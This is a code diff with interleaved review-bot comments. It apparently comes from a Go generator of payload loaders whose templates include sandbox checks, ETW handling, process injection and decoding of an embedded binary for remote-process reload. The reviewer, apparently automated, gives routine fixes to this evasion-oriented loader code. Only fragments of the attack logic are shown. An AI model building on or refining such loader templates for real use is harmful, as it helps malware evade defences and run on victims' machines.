diff --git a/.goreleaser.yml b/.goreleaser.yml
new file mode 100644
index 0000000..15327ae
--- /dev/null
+++ b/.goreleaser.yml
@@ -0,0 +1,35 @@
+# This is an example goreleaser.yaml file with some sane defaults.
+# Make sure to check the documentation at http://goreleaser.com
+before:
+ hooks:
+ # You may remove this if you don't use go modules.
+ - go mod download
+ # you may remove this if you don't need go generate
+ - go generate ./...
+builds:
+- env:
+ - CGO_ENABLED=0
+ goos:
+ - "darwin"
+ - "linux"
+ - "windows"
+ goarch:
+ - "amd64"
+archives:
+ - name_template: "{{ .ProjectName }}_{{ .Version }}_{{ .Os }}_{{ .Arch }}"
+ format: binary
+ files:
+ - LICENSE.txt
+ - README.md
+checksum:
+ name_template: '{{ .ProjectName }}_checksums.txt'
+source:
+ enabled: false
+snapshot:
+ name_template: "{{ .Tag }}-next"
+changelog:
+ sort: asc
+ filters:
+ exclude:
+ - '^docs:'
+ - '^test:'
diff --git a/Loader/Loader.go b/Loader/Loader.go
index 478c0d2..0a05785 100644
--- a/Loader/Loader.go
+++ b/Loader/Loader.go
@@ -694,6 +694,7 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string,
 }
 if sandbox == true {
+ Binary.Variables["SandboxOS"] = `"os"`
 Binary.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(4, 12)
 Binary.Variables["domain"] = Cryptor.VarNumberLength(4, 12)
 Binary.Variables["status"] = Cryptor.VarNumberLength(4, 12)
@@ -720,6 +721,7 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string,
 Binary.Variables["Sandbox"] = ""
 Binary.Variables["Sandboxfunction"] = ""
 Binary.Variables["SandboxImport"] = ""
+ Binary.Variables["SandboxOS"] = ""
 }
 if ETW == false {
diff --git a/Struct/Struct.go b/Struct/Struct.go
index 79cf2a0..cfeb86e 100644
--- a/Struct/Struct.go
+++ b/Struct/Struct.go
@@ -501,6 +501,7 @@ func Binary() string {
 "syscall"
 "unsafe"
 "strconv"
+ {{.Variables.SandboxOS}}
 "golang.org/x/sys/windows"
 "golang.org/x/sys/windows/registry"
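Review bot: In .goreleaser.yml the `checksum:` block publishes an unsigned `{{ .ProjectName }}_checksums.txt` next to the binaries, so anyone who can replace a release asset can replace the checksum file with it; the checksums catch corruption, not tampering. A `signs:` section that signs the checksum artifact (`artifacts: checksum`) would give downloaders something to verify against a key kept off the release host. The `before.hooks` entry `go generate ./...` runs every `//go:generate` directive in the tree on the release machine, so it is worth dropping if the project has none. Separately, the `files:` entries under `archives` are probably ignored with `format: binary`, since no archive is built in that mode, so LICENSE.txt and README.md would not ship.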
@@ -972,6 +973,7 @@ func Procces_Injection_DLL() string {
 "[loader]/[loader]"
 "io/ioutil"
 "syscall"
+ "os"
 "time"
 "unsafe"
 "strconv"
@@ -1300,6 +1302,7 @@ func Start() {
 {{.Variables.hexdata}}, _ := base64.StdEncoding.DecodeString({{.Variables.rawdata}})
 {{.Variables.raw_bin}}, _ := hex.DecodeString(string({{.Variables.hexdata}}))
 {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}})
+ os.Stdout, _ = os.Open(os.DevNull)
 }
@@ -1417,6 +1420,7 @@ func Procces_Injection() string {
 "time"
 "unsafe"
 "strconv"
+ {{.Variables.SandboxOS}}
 "golang.org/x/sys/windows"
 "golang.org/x/sys/windows/registry"
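Review bot: The added `os.Stdout, _ = os.Open(os.DevNull)` at the end of the templated Start() (Struct.go, @@ -1300) discards the error and overwrites a process-global with whatever came back, which is a nil *os.File if the open fails. os.Open also opens the file read-only, so later writes through os.Stdout return an error rather than being written to the null device. `f, err := os.OpenFile(os.DevNull, os.O_WRONLY, 0)` followed by `if err == nil { os.Stdout = f }` keeps the original handle on failure and gives a writable one on success. Start() begins outside the hunk, and the unconditional `"os"` import added in the @@ -972 hunk appears to exist only to support this line.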
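Review bot: `{{.Variables.SandboxOS}}` is added to the Procces_Injection import list (Struct.go, @@ -1417), but the only assignments to `Binary.Variables["SandboxOS"]` visible in this commit are the two in Loader.go's Binaryfile (@@ -694 and @@ -720), which presumably feed the Binary template at @@ -501. The code that renders Procces_Injection is outside the diff, so it is worth confirming that it sets the key in both the sandbox and non-sandbox paths. Depending on the map's element type, an unset key renders as an empty string or as `<no value>`, and the latter would break the generated import block. Parsing the templates with `Option("missingkey=error")` would make an unset placeholder fail at render time instead of producing broken source. When the value is `"os"`, the rendered template also has to reference the package and must not import it a second time, because Go rejects both unused and duplicate imports.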